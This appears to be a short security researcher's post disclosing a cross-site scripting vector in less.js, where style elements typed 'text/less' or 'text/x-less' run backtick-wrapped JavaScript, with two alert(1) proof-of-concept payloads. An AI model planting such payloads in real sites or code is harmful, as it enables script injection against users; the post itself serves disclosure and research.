xss attack vector at "style" context for less.js


detail

less & sass suddenly came to my mind when researching about of css injection attacks. you know, both are css pre-processor so i think they don't support any client based operation. it is a mistake...

i saw less.js when visiting to http://lesscss.org/ page. less.js provides interpreting javascript code with backtick char in less code. so dom based xss vulnerability arises at this point.

i published it on twitter as the new attack vector for less.


shortening

also thanks to rakesh mane for the shortening!


payloads

less.js includes the regex pattern for type attribute of style element.

var t=/^text\/(x-)?less$/;

so it is supporting these payloads:

<style type='text/less'>x{x:`alert(1)`}</style>
<style type='text/x-less'>x{x:`alert(1)`}</style>